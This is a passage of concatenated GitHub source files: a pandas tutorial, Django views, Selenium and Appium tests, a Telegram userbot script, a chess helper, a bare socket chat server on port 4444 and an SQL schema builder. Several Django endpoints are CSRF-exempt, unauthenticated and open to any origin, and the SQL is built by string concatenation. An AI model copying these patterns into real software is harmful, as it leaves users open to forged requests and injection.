6])])\nprint('df from list of two tuple using from_items()\\n%s\\n' % df)\n# with orient='index'\ndf=DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])], orient='index', columns=['un', 'dos', 'tres'])\nprint('df from list of two tuple using from_items(orient=index)\\n%s\\n' % df)\n","repo_name":"rajatgirotra/study","sub_path":"pythonTutorial/numpy_pandas/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27059330535","text":"# -*- coding: utf-8 -*-\nimport json\nfrom random import sample\n\nfrom django.shortcuts import render\nfrom django import forms\nfrom django.core import serializers\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom post.models import Story, StoryForm, Vote\nfrom post.recommendations import ProductRecommendationProvider\nfrom register.models import User\n\nrecommender = ProductRecommendationProvider()\n\n@csrf_exempt\ndef create(request):\n # return HttpResponseRedirect('http://www.facebook.com')\n if request.method == 'POST':\n form = StoryForm(request.POST, request.FILES)\n if form.is_valid():\n userID = form.cleaned_data['userID']\n user = User.objects.get(id=userID)\n user.coins += 5\n user.save()\n\n new_story = form.save()\n story = Story.objects.get(pk = new_story.pk)\n story.userName = user.name\n story.save()\n\n response_data = serializers.serialize('json', [story,])\n return HttpResponse(response_data, content_type='application/json')\n else:\n print(form.errors)\n form = StoryForm()\n return render(request, 'temp.html', {'form': form})\n\ndef getStory(request):\n friends = request.GET.getlist('friends[]')\n stories = Story.objects.filter(userID__in = friends).order_by('id').reverse()\n response_data = serializers.serialize('json', stories)\n struct = json.loads(response_data)\n response_data = json.dumps(struct, ensure_ascii=False)\n response = HttpResponse(response_data, 
content_type='application/json')\n    response['Access-Control-Allow-Origin'] = '*'\n    response['Access-Control-Allow-Methods'] = 'POST, GET'\n    response['Access-Control-Max-Age'] = '1000'\n    response['Access-Control-Allow-Headers'] = '*'\n    response['charset'] = 'utf-8'\n    return response\n\n@csrf_exempt\ndef vote(request):\n    if request.method == 'POST':\n        storyID = request.POST.get('storyID', '2')\n        userFBID = request.POST.get('userFBID', '1')\n        score = float(request.POST.get('score', '1'))\n        vote = Vote.objects.filter(story_id = storyID, user_id = userFBID)\n        story = Story.objects.get(pk = storyID)\n\n        if vote.exists():\n            vote = vote[0]\n\n            if vote.score > 0:\n                story.likes += 1\n                story.dislikes -= 1\n            else:\n                story.likes -= 1\n                story.dislikes += 1\n            vote.score = score\n            vote.save()\n        else:\n            if score > 0:\n                story.likes += 1\n            else:\n                story.dislikes += 1\n            vote = Vote.objects.create(story_id = storyID, user_id = userFBID, score = score)\n\n        story.save()\n        return HttpResponse(status = 201)\n\n    response = HttpResponse(status = 200)\n    response['Access-Control-Allow-Origin'] = '*'\n    response['Access-Control-Allow-Methods'] = 'POST, GET, DELETE'\n    response['Access-Control-Max-Age'] = '1000'\n    response['Access-Control-Allow-Headers'] = '*'\n    return response\n\n@csrf_exempt\ndef deleteVote(request):\n    storyID = request.POST['storyID']\n    userFBID = request.POST['userFBID']\n    score = float(request.POST['score'])\n    Vote.objects.filter(story_id = storyID, user_id = userFBID).delete()\n\n    story = Story.objects.get(pk = storyID)\n    if score > 0:\n        story.likes -= 1\n    else:\n        story.dislikes -= 1\n    story.save()\n    return HttpResponse(status = 202)\n\ndef getVotes(request):\n    storyID = request.GET['storyID']\n    userFBID = request.GET['userFBID']\n    response_data = serializers.serialize('json', Vote.objects.filter(story_id = storyID, user_id = userFBID))\n    struct = json.loads(response_data)\n    response_data = json.dumps(struct, ensure_ascii = False)\n    response = HttpResponse(response_data, content_type='application/json')\n    response['Access-Control-Allow-Origin'] = '*'\n    response['Access-Control-Allow-Methods'] = 'POST, GET'\n    response['Access-Control-Max-Age'] = '1000'\n    response['Access-Control-Allow-Headers'] = '*'\n    response['charset'] = 'utf-8'\n    return response\n\ndef getUser(request):\n    userID = request.GET['userFBID']\n    response_data = serializers.serialize('json', [User.objects.get(id = userID),])\n    struct = json.loads(response_data)\n    response_data = json.dumps(struct, ensure_ascii = False)\n    response = HttpResponse(response_data, content_type='application/json')\n    response['Access-Control-Allow-Origin'] = '*'\n    response['Access-Control-Allow-Methods'] = 'POST, GET'\n    response['Access-Control-Max-Age'] = '1000'\n    response['Access-Control-Allow-Headers'] = '*'\n    response['charset'] = 'utf-8'\n    return response\n\ndef recommend(request):\n    userID = request.GET.get('userFBID', '0')\n    user = User.objects.get(id = userID)\n    if(user.coins <= 0):\n        return HttpResponse(status = 204)\n    user.coins -= 1\n    user.save()\n\n    # recommender.precompute()\n    recommendations = []\n    query = list(recommender.storage.get_recommendations_for_user(user = User.objects.get(id = userID)))\n    for recommendation in query:\n        recommendations.append(recommendation.object)\n    if(len(recommendations) < 5):\n        count = Story.objects.all().count()\n        rand_ids = sample(range(1, count), 5 - len(recommendations))\n        stories = list(Story.objects.filter(id__in=rand_ids))\n        for story in stories:\n            recommendations.append(story)\n\n    serialized_string = 
serializers.serialize('json', recommendations)\n json_string = json.loads(serialized_string)\n response_data = json.dumps(json_string, ensure_ascii=False)\n response = HttpResponse(response_data, content_type='application/json')\n response['Access-Control-Allow-Origin'] = '*'\n response['Access-Control-Allow-Methods'] = 'POST, GET'\n response['Access-Control-Max-Age'] = '1000'\n response['Access-Control-Allow-Headers'] = '*'\n response['charset'] = 'utf-8'\n return response\n","repo_name":"RealWei/Social-Computing-Application-Design","sub_path":"final/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33228019649","text":"\"\"\"\nEnvironment for Behave Testing\n\"\"\"\nfrom behave import *\nfrom os import getenv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.common.by import By\n\nWAIT_SECONDS = int(getenv('WAIT_SECONDS', '3'))\n# PORT = int(getenv('PORT', 8080))\n# BASE_URL = getenv('BASE_URL', 'http://127.0.0.1:' + str(PORT) + '/app/index.html')\nBASE_URL = getenv('BASE_URL', 'http://127.0.0.1:5000')\n\ndef before_all(context):\n \"\"\" Executed once before all tests \"\"\"\n \n options = webdriver.ChromeOptions()\n options.add_argument(\"start-maximized\") # open browser in maximized mode\n options.add_argument(\"disable-infobars\") # disabling infobars\n options.add_argument(\"--disable-extensions\") # disabling extensions\n options.add_argument(\"--disable-gpu\") # applicable to windows os only\n options.add_argument(\"--disable-dev-shm-usage\") # overcome limited resource problems\n options.add_argument(\"--no-sandbox\") # bypass OS security model\n options.add_argument(\"--headless\")\n\n context.WAIT_SECONDS = WAIT_SECONDS\n\n # enable browser logging\n d = DesiredCapabilities.CHROME\n d['loggingPrefs'] = { 'browser':'ALL' }\n\n context.driver = webdriver.Chrome(options=options, desired_capabilities=d)\n context.driver.set_window_size(1120, 550)\n context.driver.implicitly_wait(context.WAIT_SECONDS) # seconds\n context.base_url = BASE_URL\n # -- SET LOG LEVEL: behave --logging-level=ERROR ...\n # on behave command-line or in \"behave.ini\"\n context.config.setup_logging()\n\ndef after_all(context):\n \"\"\" Executed after all tests \"\"\"\n context.driver.quit()\n\ndef after_scenario(context, scenario):\n # clear the results box for the next feature test\n clear_wishlist_button = context.driver.find_element_by_id(\"wishlist_result_clear\")\n wishlist_result = context.driver.find_element_by_id(\"wishlist_result\")\n actions = ActionChains(context.driver)\n actions.move_to_element(clear_wishlist_button)\n actions.click(clear_wishlist_button)\n actions.perform()\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n expected_conditions.text_to_be_present_in_element(\n (By.ID, \"wishlist_result_status\"),\n \"Awaiting next action\"\n )\n )\n\n clear_item_button = context.driver.find_element_by_id(\"item_result_clear\")\n item_result = context.driver.find_element_by_id(\"item_result\")\n actions = ActionChains(context.driver)\n actions.move_to_element(clear_item_button)\n actions.click(clear_item_button)\n actions.perform()\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n 
expected_conditions.text_to_be_present_in_element(\n (By.ID, \"item_result_status\"),\n \"Awaiting next action\"\n )\n )\n\n\n# the following are shared Gherkin steps between Wishlists and Items:\n\nbuttonDictionary = {\n \"Create Wishlist\": \"wishlist_create\",\n \"List Wishlists\": \"wishlist_list\",\n \"Read Wishlist\": \"wishlist_read\",\n \"Search Wishlists\": \"wishlist_search\",\n \"Update Wishlist\": \"wishlist_update_0\",\n \"Delete Wishlist\": \"wishlist_delete_0\",\n \"Add Item\": \"item_create\",\n \"Update Item\": \"item_update_0\",\n \"Delete Item\": \"item_delete_0\",\n \"Purchase Item\": \"item_purchase_0\"\n}\n\n@when('I press the button \"{button}\" in the \"{type}\" form')\ndef step_impl(context, button, type):\n button_element = context.driver.find_element_by_id(buttonDictionary[button])\n actions = ActionChains(context.driver)\n actions.move_to_element(button_element)\n actions.click(button_element)\n actions.perform()\n result_field = \"wishlist_result_status\" if type == \"Wishlist\" else \"item_result_status\"\n try:\n WebDriverWait(context.driver, WAIT_SECONDS).until(\n expected_conditions.text_to_be_present_in_element(\n (By.ID, result_field),\n \"Transaction complete\"\n )\n )\n actions.reset_actions()\n finally:\n print('Timeout encountered, browser console logs:')\n for entry in context.driver.get_log('browser'):\n print(entry)\n\n@then('I should see the message \"{message}\" in \"{element_id}\"')\ndef step_impl(context, message, element_id):\n element = context.driver.find_element_by_id(element_id)\n assert message in element.text\n\n@then('the server response code should be \"{code}\" in \"{element_id}\"')\ndef step_impl(context, code, element_id):\n element = context.driver.find_element_by_id(element_id)\n assert code in element.text\n\n@then('the table \"{table_id}\" should contain at least one row')\ndef step_impl(context, table_id):\n table = context.driver.find_element_by_id(table_id)\n html = table.get_attribute(\"innerHTML\")\n assert \"\" in html\n\n@when('I enter \"{search_string}\" in the \"{search_field}\" input field')\ndef step_impl(context, search_string, search_field):\n search_input = context.driver.find_element_by_id(search_field)\n search_input.clear()\n search_input.send_keys(search_string)\n\n@when('I change \"{input_id}\" to \"{new_value}\"')\ndef step_impl(context, input_id, new_value):\n input_element = context.driver.find_element_by_id(input_id)\n input_element.clear()\n input_element.send_keys(new_value)\n\n@then('I should see \"{value}\" in \"{input_id}\"')\ndef step_impl(context, value, input_id):\n input_element = context.driver.find_element_by_id(input_id)\n assert value in input_element.get_attribute('value')\n","repo_name":"NYU-DevOps-Squad-Wishlists/wishlists","sub_path":"features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33851002126","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# @Author : SUN FEIFEI\nimport time\nimport unittest\n\nfrom app.honor.pc_operation.my_resource.test_cases.delete_tiny_course.delete_course import Delete\nfrom conf.base_page import BasePage\nfrom conf.decorator import testcase, teststeps, setup\nfrom app.honor.teacher.home.vanclass.object_page.home_page import ThomePage\nfrom app.honor.teacher.login.object_page.login_page import TloginPage\nfrom app.honor.teacher.test_bank.object_page.games_detail_page import GamesPage\nfrom 
app.honor.teacher.test_bank.object_page.test_bank_page import TestBankPage\nfrom app.honor.teacher.user_center.mine_test_bank.object_page.mine_test_bank_page import MineTestBankPage\nfrom app.honor.teacher.user_center.tiny_course.object_page.create_tiny_course_page import CreateTinyCourse\nfrom app.honor.teacher.user_center.tiny_course.object_page.video_page6X import VideoPage\nfrom app.honor.teacher.user_center.tiny_course.test_data.edit_video_name import name_data\nfrom app.honor.teacher.user_center.user_information.object_page.user_center_page import TuserCenterPage\nfrom utils.assert_func import ExpectingTest\nfrom utils.toast_find import Toast\n\n\nclass TinyCourse(unittest.TestCase):\n \"\"\"微课 本地视频 课程名\"\"\"\n @classmethod\n @setup\n def setUp(cls):\n \"\"\"启动应用\"\"\"\n cls.ass_result = unittest.TestResult()\n cls.ass = ExpectingTest(cls, cls.ass_result)\n cls.login = TloginPage()\n cls.home = ThomePage()\n cls.user = TuserCenterPage()\n cls.tiny = CreateTinyCourse()\n cls.video = VideoPage()\n cls.game = GamesPage()\n cls.mine = MineTestBankPage()\n cls.question = TestBankPage()\n\n BasePage().set_assert(cls.ass)\n\n def tearDown(self):\n for i in self.ass.get_error():\n self.ass_result.addFailure(self, i)\n\n def run(self, result=None):\n self.ass_result = result\n super(TinyCourse, self).run(result)\n\n @testcase\n def test_edit_course_name(self):\n self.login.app_status() # 判断APP当前状态\n\n if self.home.wait_check_page(): # 页面检查点\n self.home.click_tab_profile() # 进入首页后点击‘个人中心’按钮\n\n if self.user.wait_check_page(): # 页面检查点\n self.user.click_tiny_course() # 进入 微课页面\n if self.tiny.wait_check_page():\n self.choice_local_video() # 选择视频 具体操作\n self.course_name_operation() # 课程名编辑 具体操作\n else:\n print(\"!!!未进入 微课页面\")\n\n if self.user.wait_check_page(): # 页面检查点\n self.home.click_tab_hw() # 回首页\n # Delete().delete_tiny() # 恢复测试数据\n else:\n Toast().get_toast() # 获取toast\n print(\"!!!未进入主界面\")\n\n @teststeps\n def choice_local_video(self):\n \"\"\"选择本地视频 操作\"\"\"\n print('---------------选择本地视频 操作----------------')\n self.tiny.create_tiny_course() # + 微课内容\n if self.tiny.wait_check_menu_page():\n self.tiny.menu_item()[1].click() # 点击 本地视频\n if self.video.wait_check_local_page():\n self.video.menu_button() # 左上角\n time.sleep(2)\n self.video.video_file_button()\n if self.video.wait_check_video_file_page('视频'):\n self.video.album_button()[0].click()\n\n if self.video.wait_check_local_list_page():\n self.video.album_button()[2].click() # 选择视频\n\n if self.video.wait_check_cut_page(3): # 时长多于3min的视频\n self.video.finish_button()\n\n @teststeps\n def course_name_operation(self):\n \"\"\"课程名编辑 具体操作\"\"\"\n print('=========================编辑课程名 具体操作==========================')\n if self.tiny.wait_check_page():\n for i in range(len(name_data)):\n if self.tiny.wait_check_list_page():\n var = self.tiny.course_name() # 微课名称\n var.send_keys(name_data[i]['name'])\n print('输入微课名称:', var.text) # 编辑课程名称\n self.tiny.save_button() # 点击 保存按钮\n\n if len(name_data[i]) == 2:\n Toast().toast_operation(name_data[i]['assert'])\n print('=============================================================')\n else:\n self.judge_upload_operation() # 判断视频 是否 正在上传中\n\n if self.game.wait_check_page(): # 游戏详情页\n self.home.back_up_button()\n if self.user.wait_check_page():\n self.tiny.judge_save_result(name_data[i]['name']) # 验证视频保存结果\n\n if i != len(name_data)-1:\n print('=============================================================')\n if self.user.wait_check_page(): # 页面检查点\n self.user.click_tiny_course() # 进入 微课页面\n if 
self.tiny.wait_check_page():\n if self.tiny.wait_check_list_page():\n self.choice_local_video() # 选择视频 具体操作\n\n @teststeps\n def judge_upload_operation(self, var=3):\n \"\"\"判断视频 是否 正在上传中 及取消加入公共题库\"\"\"\n if self.tiny.wait_check_upload_page(): # 上传中....\n # self.upload_rate() # 上传百分率\n # self.upload_num() # 上传数量\n while True:\n if self.tiny.check_upload_progress(): # 上传中....\n time.sleep(1)\n else:\n ThomePage().tips_content_cancel(var) # 提示 页面信息\n break\n\n # @teststeps\n # def recovery_data(self):\n # \"\"\" 恢复测试数据\"\"\"\n # print('------恢复测试数据-----')\n # account_id = GetDBData().get_account_id()\n # print(account_id)\n # for i in range(len(name_data)): # 恢复测试数据\n # if len(name_data[i]) == 1:\n # sql = \"DELETE FROM `testbank` WHERE `account_id` = '{}' AND `name`= '{}'\" \\\n # .format(account_id, name_data[i]['name'])\n # print(sql)\n # ConnectDB().execute_sql(sql)\n","repo_name":"sj542484/test","sub_path":"testfarm/test_program/app/honor/teacher/user_center/tiny_course/test_cases/test007_edit_video_name.py","file_name":"test007_edit_video_name.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4469509409","text":"from sys import stdin\nN = int(input())\nnumL = list(map(int, stdin.readline().split()))\nM = int(input())\ncheckL = list(map(int, stdin.readline().split()))\nnumL.sort()\nfor i in checkL:\n left = 0\n right = len(numL)-1\n isPrint = False\n while left <= right:\n mid = (left+right)//2\n if numL[mid] == i:\n print('1')\n isPrint = True\n break\n elif numL[mid] > i:\n right = mid-1\n else:\n left = mid+1\n if not isPrint:\n print('0')\n","repo_name":"JanSoLul/bj","sub_path":"bj/1000/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14673386810","text":"from pyrogram import Client , Message , Filters\nfrom pyrogram.api import functions , types\nfrom db import r\nimport time\nimport bot\n\n### RECENTLY & ONLINE\n@Client.on_message(Filters.me & Filters.regex(\"^(!nobody|!everybody)$\") , group=18)\ndef setprivacy(app : Client ,msg : Message):\n if \"obody\" in str(msg.text):\n app.send(\n functions.account.SetPrivacy(\n key=types.InputPrivacyKeyStatusTimestamp(),\n rules=[types.InputPrivacyValueDisallowAll()]\n )\n )\n app.edit_message_text(text=bot.botfullprefix + \"Режим невидимки `Вкл`\",\n chat_id=msg.chat.id,\n message_id=msg.message_id,)\n r.set(\"lastseen\", \"NoBody\")\n if r.get(\"autodel\") == \"on\":\n time.sleep(float(r.get(\"autodeltime\")))\n app.delete_messages(msg.chat.id,msg.message_id)\n\n\n else:\n app.send(\n functions.account.SetPrivacy(\n key=types.InputPrivacyKeyStatusTimestamp(),\n rules=[types.InputPrivacyValueAllowAll()]\n )\n )\n\n app.edit_message_text(text=bot.botfullprefix + \"Режим невидимки `Выкл`\",\n chat_id=msg.chat.id,\n message_id=msg.message_id,)\n r.set(\"lastseen\", \"EveryBody\")\n if r.get(\"autodel\") == \"on\":\n time.sleep(float(r.get(\"autodeltime\")))\n app.delete_messages(msg.chat.id,msg.message_id)\n","repo_name":"Conradk10/telegram-multibot","sub_path":"plugins/lastseen.py","file_name":"lastseen.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"68"} +{"seq_id":"14385400791","text":"import pandas as pd\r\nimport making\r\n\r\n\r\nall_group = making.all_group()\r\ntempdf = 
pd.read_excel(r'C:\\Users\\User\\Downloads\\{}.xlsx'.format(making.ThisYearAttendnce), sheet_name=None)\r\n\r\nprinting= 'yes'#input('명단 프린트할꺼라면 yes라고 치기')\r\n\r\na=[]\r\nb=[]\r\ntemp=[]\r\n\r\n\r\nfiltered_data=[] #먼저 빈리스트 정의하기\r\nfor i in range(len(all_group)): #인덱스가 같은지 보기 (요류 방지용)\r\n df = tempdf[all_group[i]]\r\n df.set_index('날짜\\이름', inplace=True)\r\n\r\n namelist = df.columns\r\n # print(all_group[i], namelist.tolist()) #정렬하기 않고 기존꺼 포현할때 쓰는것\r\n\r\n #프린트 명부에서 제거해야할 명단의 딕셔너리\r\n file_name = \"except_data.txt\"\r\n loaded_data = making.makedictfromtxt(file_name)\r\n\r\n for j in namelist: # 기존 엑셀시트에 있는 이름중\r\n if df[j][(df[j] == 'O') | (df[j] == 'X')].count() >5: # X든 O든 총개수가 5를 넘어야\r\n a.append( (j,float(df.loc[df.index[-1], j])) )\r\n # print(all_group[i],j,df.loc[df.index[-1], j])\r\n else:\r\n b.append( (j,float(df.loc[df.index[-1], j])) )\r\n\r\n\r\n a.sort(key=lambda x: x[1], reverse=True) #전부 정보획득했으면 정렬하기\r\n b.sort(key=lambda x: x[1], reverse=True) #(이름, 출석율)의 정보 리스트, a는 출석개수가 많은것 b는적은것\r\n a= a+b #출석 정보가 작은 애들은 뒤로 빼준 것임.\r\n a.remove(('기타',0)) #기타는 첫번째로 넣어야되서 일단 삭제\r\n # print('dd',[item for item in a if (int(item[1]) < 10 and item[0] not in loaded_data[all_group[i]])])\r\n filtered_data = filtered_data+ [all_group[i]]+ [item for item in a if int(item[1]) <= 15 and item[0] not in loaded_data[all_group[i]] ]\r\n #출석율이 특정숫자보다 낮고 제거명부에 없는 애들은 명부 프린트에서 제거해줄지 검토해야함\r\n #목장이름+ 리스트형태로 명부 만들어서 마지막에 프린트해줌.\r\n\r\n #칼럼에 넣을 리스트 만들기\r\n for l in range(len(a)):\r\n temp.append(a[l][0]) #출석율 높은 순서대로 넣는것임.\r\n\r\n # print(temp)\r\n\r\n temp.insert(0,'기타') #기타 첫번째로 다시 넣어주기\r\n df=df.loc[:,temp] #데이터 프레임에 주어진 명단순서대로 넣기, 다만 to_excel안하면 큰 의미는 없음.\r\n # df=df[[temp]]\r\n\r\n\r\n if all_group[i] in loaded_data.keys():# 명단에서 제외해야할 명단이 있다면\r\n temp = making.gettruelist(temp, loaded_data[all_group[i]]) # 순서에서 제외해서 저장하기\r\n\r\n\r\n # print(all_group[i],temp) #애들 한글 명단 다시 만들때 활용할 코드부분. 
한줄로 출력할때 사용\r\n if printing == 'yes': #프린트 하는게 맞으면\r\n making.make_line(all_group[i],temp) #n명씩 잘라서 표현할때\r\n\r\n\r\n #변수 초기화\r\n temp=[]\r\n a=[]\r\n b=[]\r\n\r\n if all_group[i] != '새신자':\r\n # df.to_excel(\"{}.xlsx\".format(all_group[i]))\r\n pass # 정렬화한 후 엑셀출력이 필요가 없어서 주석처리해놓음.\r\n else: #새신자이면\r\n print(\"\")\r\n print(\"이름:\")\r\n print(\"전도자(목장):\")\r\n print(\"인적사항:\")\r\n print(\"주소 생년월일 학교명 가족관계 핸드폰번호\")\r\n\r\n\r\n#전체 리스트 출력해주기, attendance초기화할때 이거 복붙하는것임.\r\nif printing =='yes':\r\n print(\"\")\r\n for m in all_group:\r\n print(m)\r\n print('불출석')\r\n print('등반자')\r\n\r\nprint(\"\")\r\nprint(\"\")\r\nprint(filtered_data)\r\n","repo_name":"Sanghyeon10/attendancebook","sub_path":"make order.py","file_name":"make order.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11743196832","text":"import socket\n\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nip = \"0.0.0.0\"\nport = 4444\n\ntry:\n\tserver.bind((ip, port))\n\tserver.listen(5)\n\tprint(\"Listening in: \" + ip + \": \" + str(port))\n\tclient_socket, address = server.accept()\n\tprint(\"received from: \" + address[0])\n\twhile True:\n\t\tdata = client_socket.recv(1024)\n\t\tprint(\"\\n\" + data)\n\t\tvoce = raw_input(\"\\nvoce: \")\n\t\tclient_socket.send(voce)\n\tserver.close()\n\nexcept Exception as erro:\n\n\tprint(\"Conexao falhou\")\n\n\tprint(erro)\n\t\n\tserver.close()\n","repo_name":"Yagho38/wordlists","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73173024216","text":"#!/usr/bin/env pypy3\n\ndef ans(A):\n ret = 0\n for c in A[-1][:-1]:\n if c != 'R':\n ret += 1\n for row in A[:-1]:\n if row[-1] != 'D':\n ret += 1\n return ret\n\nT = int(input())\n\nfor _ in range(T):\n n, m = input().split()\n n = int(n)\n m = int(m)\n\n A = []\n for _ in range(n):\n A += [input()]\n\n print(ans(A))\n","repo_name":"ldct/cp","sub_path":"codeforces/663/B/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"14812274325","text":"from django.db import models\n\nimport swapper\nfrom django.core.validators import RegexValidator, MinValueValidator\nfrom formula_one.models.base import Model\nfrom r_care.constants import verification\n\n\nclass Lead(Model):\n \"\"\"\n Short Description about the model\n \"\"\"\n\n uploader = models.ForeignKey(\n to=swapper.get_model_name('kernel', 'Person'),\n related_name='leads',\n on_delete=models.CASCADE,\n )\n upvotes = models.ManyToManyField(\n swapper.get_model_name('kernel', 'Person'),\n related_name='leads_upvotes',\n blank=True\n )\n downvotes = models.ManyToManyField(\n swapper.get_model_name('kernel', 'Person'),\n related_name='leads_downvotes',\n blank=True\n )\n name = models.CharField(\n max_length=255,\n )\n contact = models.CharField(\n max_length=63\n )\n pin_code = models.IntegerField(\n validators=[\n RegexValidator(r'^[0-9]{3,9}$'),\n MinValueValidator(0),\n ],\n )\n address = models.TextField()\n verification = models.CharField(\n max_length=50,\n choices=verification,\n default='verified_by_me'\n )\n other_contact = models.CharField(\n max_length=255,\n blank=True,\n null=True\n )\n\n def __str__(self):\n \"\"\"\n Short Description about the model\n \"\"\"\n name = self.name\n verification = 
self.verification\n return f'Lead: Name = {name}, Verification = {verification}'\n","repo_name":"IMGIITRoorkee/omniport-app-covid-care","sub_path":"models/leads.py","file_name":"leads.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40735290409","text":"def saddle_points(matrix):\n # validate input\n for i in range(len(matrix) - 1):\n if len(matrix[i]) != len(matrix[i+1]):\n raise ValueError(\"irregular input matrix\")\n \n transposed_matrix = [list (tuple) for tuple in zip(*matrix)]\n result = set([])\n # loop through each row\n for i in range(len(matrix)):\n # loop through each number in row\n for j in range(len(matrix[i])):\n # if number is largest in the row\n if matrix[i][j] >= max(matrix[i]):\n # and if number is smallest in the column\n if transposed_matrix[j][i] <= min(transposed_matrix[j]):\n # add the position in the matrix to the result set\n result.add((i, j))\n return result\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/saddle-points/b2132f862d7b49e39ec3cb078e87b833.py","file_name":"b2132f862d7b49e39ec3cb078e87b833.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"42175026829","text":"import chess\nimport chess.engine\n\nclass VarTracker:\n def __init__(self):\n self.user_move = \"\"\n self.user_color = True\n self.output_box_text = \"\"\n self.invalid_move = False\n self.engine_move = \"\"\n self.engine_level = 5\n self.show_board = False\n self.user_resigned = False \n self.should_output_speech = False\n \n \n \n","repo_name":"caleb-bynum/blindfoldChess","sub_path":"VarTracker.py","file_name":"VarTracker.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35004917976","text":"import csv\n\nfile = open('game_data_ordered.csv')\ngame_data = csv.reader(file)\n#total_csv_rows = sum(1 for row in game_data) ## gets the total rows in csv file, \n ## but removes data for some reason\n#print(total_csv_rows)\n\nmatrix = list()\nfor row in game_data:\n matrix.append(row)\n\n\ndef ForeginKeyCascade(key: str):\n return \"FOREIGN KEY(\" + key + \") REFERENCES \" + key + \"_table(\" + key + \") ON DELETE CASCADE ON UPDATE CASCADE, \"\n\ndef ForeginKey(key: str):\n return \"FOREIGN KEY(\" + key + \") REFERENCES \" + key + \"_table(\" + key + \"), \"\n\ndef PrimaryKey(keys: str):\n return \"PRIMARY KEY(\" + keys.removesuffix(\",\") + \"),\"\n\ndef DoublePK(key1: str, key2:str):\n return \"PRIMARY KEY(\" + key1 + \", \" + key2 + \"),\"\n\ndef DoubleAttrib(attrib1: str, attrib2: str, size: str):\n return attrib1 + \" VARCHAR(\" + size + \"), \" + attrib2 + \" VARCHAR(\" + size + \"), \"\n \n#############################################\n# primarys\nNUM_ATTRIBUTES = 3\nNON_CASCADES = 1\n\ndef GetAttribs(attributeData: str):\n attributes = list(str())\n attrib = str()\n for char in attributeData:\n if(char == '~'):\n attributes.append(attrib)\n attrib = str() # Reset\n else:\n attrib += char\n attributes.append(attrib)\n return attributes\n\n\ndef CreateScheme(attributes: list):\n scheme = str()\n for i in range(0, len(attributes)):\n # Check the first character of each string in the list\n if(attributes[i][0] == '*'):\n attributes[i] = str(attributes[i]).removeprefix(\"*\")\n scheme += str(attributes[i]).removeprefix(\"*\") + \" 
VARCHAR(64) PRIMARY KEY,\"\n else:\n scheme += attributes[i] + \" VARCHAR(64),\"\n\n return scheme.removesuffix(\",\")\n\n\ndef CreateSchemeJunction(attributes: list):\n scheme = str()\n pkeys = str()\n fkeys = str()\n for i in range(0, len(attributes)):\n # Check the first character of each string in the list\n if(attributes[i][0] == '&'): # FK Cascade symbol\n attributes[i] = str(attributes[i]).removeprefix(\"&\") # Attribute is already a string but intellisense is retarded\n scheme += attributes[i] + \" VARCHAR(64),\"\n fkeys += ForeginKeyCascade(attributes[i]) \n pkeys += attributes[i] + \",\"\n elif(attributes[i][0] == '#'):# FK NON Cascade symbol\n attributes[i] = str(attributes[i]).removeprefix(\"#\")\n scheme += attributes[i] + \" VARCHAR(64),\"\n fkeys += ForeginKey(attributes[i])\n pkeys += attributes[i] + \",\"\n else:\n scheme += attributes[i] + \" VARCHAR(64),\"\n\n scheme += PrimaryKey(pkeys) + fkeys.removesuffix(\", \")\n return scheme\n\n\ndef CreateSchemeInsert(attributes: list):\n insertScheme = str()\n for attribute in attributes:\n insertScheme += attribute + \",\"\n return \" (\" + insertScheme.removesuffix(\",\") + \")\"\n\n\ndef CreateTableName(attributes: list):\n assert len(attributes) > 0\n\n return attributes[0] + \"_table\"\n\ndef CreateTableNameJunction(attributes: list):\n assert len(attributes) > 1\n\n return attributes[0] + \"_\" + attributes[1] + \"_table\"\n \n\nprint(\"*****************************************************\")\n# def LoadData(numJunctions: int):\nnumTables = len(matrix[0]) # matrix[0] should be an argument\nnumJunctions = 3\nnumPrimaryTables = numTables - numJunctions\n\n# For each table in matrix[0]\nfor i in range(0, numTables):\n attributes = GetAttribs(matrix[0][i])\n if(i < numPrimaryTables):\n scheme = CreateScheme(attributes)\n print(scheme) # for testing purpose now since no sql intalled\n tableName = 